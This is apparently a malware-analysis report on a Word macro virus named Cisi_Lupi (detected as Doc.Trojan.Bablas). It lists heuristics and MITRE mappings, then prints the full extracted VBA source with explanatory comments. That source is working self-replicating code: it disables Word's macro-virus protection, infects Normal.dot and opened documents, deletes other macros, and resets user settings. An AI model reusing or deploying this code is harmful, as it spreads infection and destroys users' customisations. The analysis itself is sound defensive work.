MALICIOUS
204
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains legacy WordBasic macro-virus markers and a VBA project with auto-execution entry points (AutoOpen, AutoClose, AutoExec, AutoExit) plus macros named after built-in Word commands (FileOpen, FileSave, FileClose, ToolsOptions), which Word runs in place of those commands once the module lives in Normal.dot. The code disables Word's macro-virus protection and save prompts (Options.VirusProtection / SaveNormalPrompt / SavePropertiesPrompt = False), copies its own module between Normal.dot and the active document through the VBE object model (Application.OrganizerCopy), and deletes every other macro module it finds in the target project — classic W97M self-replication. Note that Document_Open occurs only inside a string literal that is built but never written (see CL_ThisDocumentWriter in the listing), not as a live event handler. Beyond the T1059.005 mapping, the Normal.dot persistence and the security-setting tampering correspond to Office Application Startup (T1137.001) and Disable or Modify Tools (T1562.001). The ClamAV detection as 'Doc.Trojan.Bablas-19' further supports its malicious nature.
Heuristics 7
-
ClamAV: Doc.Trojan.Bablas-19 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Bablas-19
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
VBA macro-virus self-replication / AV tampering — critical — OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature. In this sample all three mechanisms are visible in the extracted source: CodeModule.DeleteLines (CL_ClearComps), CodeModule.AddFromString (CL_ThisDocumentWriter) and Application.OrganizerCopy (CL_OrgCopy). Matched line in script:
Options.VirusProtection = False -
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. The "low" weight understates its role here: AutoOpen is the routine that disables security and infects Normal.dot (CL_OpenSecurity, TemClearComponents, NormalTemplate.Save). Matched line in script:
Sub AutoOpen() -
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Caveat: the match is a string literal inside CL_ThisDocumentWriter, which assembles Document_Close/Document_New/Document_Open handler text into a variable that is never written to the target module (only the one-line version stamp is passed to AddFromString). The sample therefore does not define a live Document_Open handler; its auto-execution comes from AutoOpen/AutoClose/AutoExec/AutoExit and the command-named macros. Matched line in script:
"Private Sub Document_Open()" + vbCrLf + _ -
Auto_Close macro — low — OLE_VBA_AUTOCLOSE: Auto_Close macro (the routine is named AutoClose, Word's auto-macro name; it infects the active document before closing the window, and FileClose is aliased to it). Matched line in script:
Sub AutoClose() -
Legacy WordBasic macro-virus markers — high — OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them. Caveat for this sample: in the extracted VBA, ToolsMacro appears only as a commented-out stub, and the live code uses WordBasic.DisableAutoMacros rather than a WordBasic macro body; whether a separate WordBasic stream exists cannot be confirmed from the listing shown here, so treat this finding as corroborating rather than independent evidence.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6498 bytes | 26d03ec462354483eeadddd384ef84cd991f1a6b169af2583913ad67c66f4a47 |
Preview script — first 1,000 lines of the extracted script. The 6498-byte artifact is far below that limit, so the listing below appears to be the complete extracted source: two modules concatenated by olevba, the document's ThisDocument class (attributes only) followed by the Cisi_Lupi standard module that carries the virus body.
' --- Module 1: ThisDocument (document class module) ---
' olevba concatenates every VBA module of the OLE file into this one listing.
' The Attribute lines below are the hidden module header of the document's
' own ThisDocument class; no procedure code belongs to this module in the
' sample, so any Document_* event handler would have to be written here at
' run time (see CL_ThisDocumentWriter, which in fact only writes a stamp).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Module 2: Cisi_Lupi (standard module carrying the virus body) ---
' The comment line that follows is the version stamp the virus writes into
' every project it infects (CL_ThisDocumentWriter) and that CL_GetVersion is
' meant to read back.
'Cisi_Lupi v1.10.000
Attribute VB_Name = "Cisi_Lupi"
' Author's note, translated from Indonesian:
' "This little program is a virus, but NOT one that will damage your
'  computer; rather, since M$Word gets infected by other, vicious viruses,
'  it is better that I take it over.
'  Respectfully, Syarif Lumintarjo <syarifl@bigfoot.com>"
' (The harmlessness claim is the author's. CL_ClearComps deletes every other
'  macro module in the projects it touches and CL_ResetSettings wipes key
'  bindings and toolbars, so the sample is destructive to user customisations.)
' DEBUG_MODE gates the MsgBox trace calls at the start of each entry point.
Const DEBUG_MODE = False
' Name of the virus module: used to recognise an already-infected project in
' CL_ClearComps and as the item name for Application.OrganizerCopy.
Const virName = "Cisi_Lupi"
' Version string of this copy of the virus. Used by CL_ThisDocumentWriter to
' build the "'Cisi_Lupi v<version>" stamp written into infected projects.
Function virVersion() As String
virVersion = "1.10.000"
End Function
' "Thank you" dialog shown from AutoExit, i.e. each time Word is closed on an
' infected machine. The only user-visible payload in the listing.
Sub ShowMessage()
MsgBox "Thank's for Not Deleting Cisi_Lupi", vbOKOnly
End Sub
' Security-setting tampering. Options.VirusProtection = False switches off
' Word's macro-virus warning so infected documents open without a prompt;
' SaveNormalPrompt / SavePropertiesPrompt = False stop Word asking before the
' modified Normal template and document properties are written. Called from
' AutoOpen and AutoExec, and again from ToolsOptions after the user closes
' the Options dialog, so the settings never stay enabled.
Sub CL_OpenSecurity()
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Options.SavePropertiesPrompt = False
End Sub
' Disabled stealth hooks, left commented out by the author. ToolsMacro,
' ViewVbCode, FileTemplates and HelpAbout are names of built-in Word commands;
' macros with these names in Normal.dot would run in place of the commands
' (here ToolsMacro would have surfaced the VBE window instead of hiding it).
' Note: the "legacy WordBasic markers" heuristic keys on ToolsMacro, which in
' the extracted VBA appears only in this inactive stub.
'Sub ToolsMacro()
'Application.VBE.MainWindow.Visible = True
'End Sub
'Sub ViewVbCode()
'ToolsMacro
'End Sub
'Sub FileTemplates()
'ToolsMacro
'End Sub
'Sub HelpAbout()
'End Sub
' Named after the built-in Tools > Options command, so Word runs this macro in
' its place once the module is in Normal.dot. It re-enables the three options
' before showing the real dialog — the user sees macro-virus protection ON —
' and then calls CL_OpenSecurity to switch them off again as soon as the
' dialog closes, silently undoing any change the user made to those settings.
Sub ToolsOptions()
Options.SaveNormalPrompt = True
Options.SavePropertiesPrompt = True
Options.VirusProtection = True
Dialogs(wdDialogToolsOptions).Show
CL_OpenSecurity
End Sub
' Sets the application title bar to "Micro$oft Word" (and the window caption
' to the document name) while the virus is working; called at the start of
' FileOpen and AutoOpen. Errors are ignored.
Sub ChangeCap()
On Error Resume Next
Application.Caption = "Micro$oft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
' Counterpart of ChangeCap: puts the title bar back after FileOpen/AutoOpen.
' The hard-coded "Bappebti Microsoft Word" is presumably the customised
' caption in use at the author's or original victim's site (Bappebti is an
' Indonesian government agency) — inferred from the string only.
Sub RestoreCap()
On Error Resume Next
Application.Caption = "Bappebti Microsoft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
' Wipes user customisations in the running Word session after each infection
' (called from TemClearComponents and DocClearComponents):
'  - all keyboard shortcuts (KeyBindings.ClearAll) — runs before the
'    On Error Resume Next, so a failure here propagates to the caller;
'  - every command bar reset to default, errors ignored (this also removes
'    custom toolbars, e.g. ones installed by add-ins — NOTE(review): which
'    add-ins are affected cannot be told from here);
'  - as-you-type spelling and grammar checking turned off;
'  - the user-templates path forced to a fixed location, so Normal.dot is
'    loaded from a predictable path.
Sub CL_ResetSettings()
KeyBindings.ClearAll
On Error Resume Next
For Each Obj In CommandBars
Obj.reset
Next Obj
Options.CheckGrammarAsYouType = False
Options.CheckSpellingAsYouType = False
Options.CheckGrammarWithSpelling = False
Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
End Sub
' Writes the infection stamp into a project. pkg is a Document or Template
' object; its first VBA component's code module (emptied just before by
' CL_ClearComps) receives the single line "'Cisi_Lupi v1.10.000" via
' CodeModule.AddFromString — this needs access to the VBA project object
' model (the VBE).
' The string s, which would inject Document_Close/Document_New/Document_Open
' handlers calling the TD_* stubs, is assembled but never used, so no event
' handler is ever installed. The Document_Open reported by the scanner is
' this dead string literal, not live code.
Sub CL_ThisDocumentWriter(pkg)
Set cm = pkg.VBProject.VBComponents(1).CodeModule
s = "'Cisi_Lupi" + vbCrLf + _
"Private Sub Document_Close()" + vbCrLf + _
"TD_DocClose" + vbCrLf + _
"End Sub" + vbCrLf + _
"Private Sub Document_New()" + vbCrLf + _
"TD_DocNew" + vbCrLf + _
"End Sub" + vbCrLf + _
"Private Sub Document_Open()" + vbCrLf + _
"TD_DocOpen" + vbCrLf + _
"End Sub"
cm.AddFromString "'Cisi_Lupi v" + virVersion + vbCrLf
End Sub
' Purges the VBA project of the Normal template (Direction = 1) or of the
' active document (Direction = 2) in preparation for infection; any other
' Direction returns False without touching anything.
'  1. every line of the first component's code module is deleted;
'  2. all components are walked: a module named virName marks the project as
'     already infected (IsOk), the ThisDocument module is re-stamped through
'     CL_ThisDocumentWriter, and every other component — i.e. all of the
'     target's own macros — is removed with Application.OrganizerDelete.
' Returns True when the virus module was already present (the caller then
' skips the copy), False otherwise. There is no error handler, so a failure
' (for instance VBProject access being refused) propagates to the caller.
Function CL_ClearComps(Direction) As Boolean
Select Case Direction
Case 1: Set Package = Application.NormalTemplate
Case 2: Set Package = Application.ActiveDocument
Case Else
Exit Function
End Select
Set Comps = Package.VBProject.VBComponents
Comps(1).CodeModule.DeleteLines 1, Comps(1).CodeModule.CountOfLines
IsOk = False
For Each Obj In Comps
If Obj.Name = virName Then IsOk = True
If Obj.Name = "ThisDocument" Then CL_ThisDocumentWriter Package
If Obj.Name <> virName And Obj.Name <> "ThisDocument" Then
Application.OrganizerDelete _
Source:=Package.FullName, _
Name:=Obj.Name, _
Object:=wdOrganizerObjectProjectItems
End If
Next Obj
CL_ClearComps = IsOk
End Function
' The replication step. Copies the macro-project item CompName with
' Application.OrganizerCopy (the Organizer's "project items" object):
' Direction 1 copies from Normal.dot into the active document, Direction 2
' from the active document into Normal.dot. Errors are suppressed; with
' DEBUG_MODE on, the source and destination paths are shown first.
Sub CL_OrgCopy(CompName, Direction)
On Error Resume Next
Select Case Direction
Case 1 'NormalTemplate to ActiveDocument
If DEBUG_MODE Then MsgBox NormalTemplate.FullName + " >> " + ActiveDocument.FullName
Application.OrganizerCopy _
Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument.FullName, _
Name:=CompName, _
Object:=wdOrganizerObjectProjectItems
Case 2 'ActiveDocument to NormalTemplate
If DEBUG_MODE Then MsgBox ActiveDocument.FullName + " >> " + NormalTemplate.FullName
Application.OrganizerCopy _
Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, _
Name:=CompName, _
Object:=wdOrganizerObjectProjectItems
End Select
End Sub
' Infects the global template: purge Normal.dot's project (CL_ClearComps 1),
' copy the virus module from the active document if it was not already there
' (CL_OrgCopy direction 2), then wipe the user's session settings.
Sub TemClearComponents()
IsOk = CL_ClearComps(1)
If Not IsOk Then CL_OrgCopy virName, 2
CL_ResetSettings
End Sub
' Infects the active document: purge its project (CL_ClearComps 2), copy the
' virus module in from Normal.dot if it was not already there (CL_OrgCopy
' direction 1), then wipe the user's session settings.
Sub DocClearComponents()
IsOk = CL_ClearComps(2)
If Not IsOk Then CL_OrgCopy virName, 1
CL_ResetSettings
End Sub
' Word auto-macro that runs when the application exits (from the infected
' Normal.dot): shows the "thank you" dialog, then quits.
Sub AutoExit()
If DEBUG_MODE Then MsgBox "AutoExit()"
ShowMessage
Application.Quit
End Sub
' Replaces the built-in File > Open command. Auto macros are disabled for the
' duration (WordBasic.DisableAutoMacros True) so the opened file's own
' AutoOpen does not fire; if the user actually chose a file (dialog result
' <> 0) the freshly opened document is infected and saved straight away.
' The title bar is changed while this runs and restored afterwards.
Sub FileOpen()
If DEBUG_MODE Then MsgBox "FileOpen()"
ChangeCap
WordBasic.DisableAutoMacros True
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
DocClearComponents
ActiveDocument.Save
End If
RestoreCap
WordBasic.DisableAutoMacros False
End Sub
' Entry point when an infected document is opened: turn off macro security
' and save prompts, change the title bar, infect Normal.dot, save the template
' (silently, since SaveNormalPrompt is already off) and restore the caption.
' On Error Resume Next only guards the save; an error inside
' TemClearComponents (e.g. VBProject access refused) is not caught.
Sub AutoOpen()
If DEBUG_MODE Then MsgBox "AutoOpen()"
CL_OpenSecurity
ChangeCap
TemClearComponents
On Error Resume Next
NormalTemplate.Save
RestoreCap
End Sub
' Auto-macro run when a document is closed: infect the active document first,
' then close its window.
Sub AutoClose()
If DEBUG_MODE Then MsgBox "AutoClose()"
DocClearComponents
ActiveWindow.Close
End Sub
' Replaces the built-in File > Close command; simply defers to AutoClose so
' closing via the menu also infects the document.
Sub FileClose()
If DEBUG_MODE Then MsgBox "FileClose()"
AutoClose
End Sub
' Replaces the built-in File > Save command. When the document has unsaved
' changes it infects both the document and Normal.dot, saves, and marks the
' document clean. A document that is already marked saved is not written at
' all — the command is swallowed.
Sub FileSave()
If DEBUG_MODE Then MsgBox "FileSave()"
If ActiveDocument.Saved = False Then
DocClearComponents
TemClearComponents
On Error Resume Next
ActiveDocument.Save
ActiveDocument.Saved = True
End If
End Sub
' Runs at Word start-up once Normal.dot is infected (persistence): disables
' auto macros and the security prompts, then schedules
' Normal.Cisi_Lupi.Demolish with Application.OnTime seven seconds later —
' presumably because no document is open yet at this point; Demolish polls
' until one is.
Sub AutoExec()
If DEBUG_MODE Then MsgBox "AutoExec()"
WordBasic.DisableAutoMacros True
CL_OpenSecurity
Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End Sub
' Placeholder target of the Document_Open handler that CL_ThisDocumentWriter
' would inject; since that handler text is never written, no visible code
' reaches this routine.
Sub TD_DocOpen()
MsgBox "TD_DocOpen"
End Sub
' Placeholder target of the never-injected Document_Close handler; unreached
' by any visible code.
Sub TD_DocClose()
MsgBox "TD_DocClose"
End Sub
' Placeholder target of the never-injected Document_New handler; unreached
' by any visible code.
Sub TD_DocNew()
MsgBox "TD_DocNew"
End Sub
' Timer callback armed by AutoExec. When at least one document is open it
' infects the active one through the Normal.dot copy of this module, turns
' auto macros back on, and saves unless the document is still the untitled
' "Document1". Otherwise it re-arms itself for another seven seconds, polling
' until a document exists. Despite the name, the only payload visible here is
' infection; errors are ignored throughout.
Sub Demolish()
On Error Resume Next
C = Documents.Count
If C <> 0 Then
Normal.Cisi_Lupi.DocClearComponents
WordBasic.DisableAutoMacros False
If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
Else
Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End If
End Sub
' Returns the 1-based position of the component named ComponentName in the
' VBProject vbp's VBComponents collection, or -1 when absent. Not called by
' any code in this listing (leftover from an earlier or planned version).
Function CL_FindVBComponent(vbp, ComponentName) As Integer
isFound = False
i = 1
For Each Obj In vbp.VBComponents
isFound = (Obj.Name = ComponentName)
If isFound Then Exit For
i = i + 1
Next Obj
If isFound Then CL_FindVBComponent = i Else CL_FindVBComponent = -1
End Function
' Reads the first line of component vbc's code module, strips its first
' character (the apostrophe of the infection stamp) and converts the rest
' with Val(). Not called by any code in this listing. Note that for the stamp
' actually written ("'Cisi_Lupi v1.10.000") the remaining text starts with
' "C", so Val() yields 0 — as written this cannot distinguish versions and
' looks like an unfinished upgrade check.
Function CL_GetVersion(vbc) As Integer
s = vbc.CodeModule.Lines(1, 1)
If s <> "" Then s = Right(s, Len(s) - 1)
CL_GetVersion = Val(s)
End Function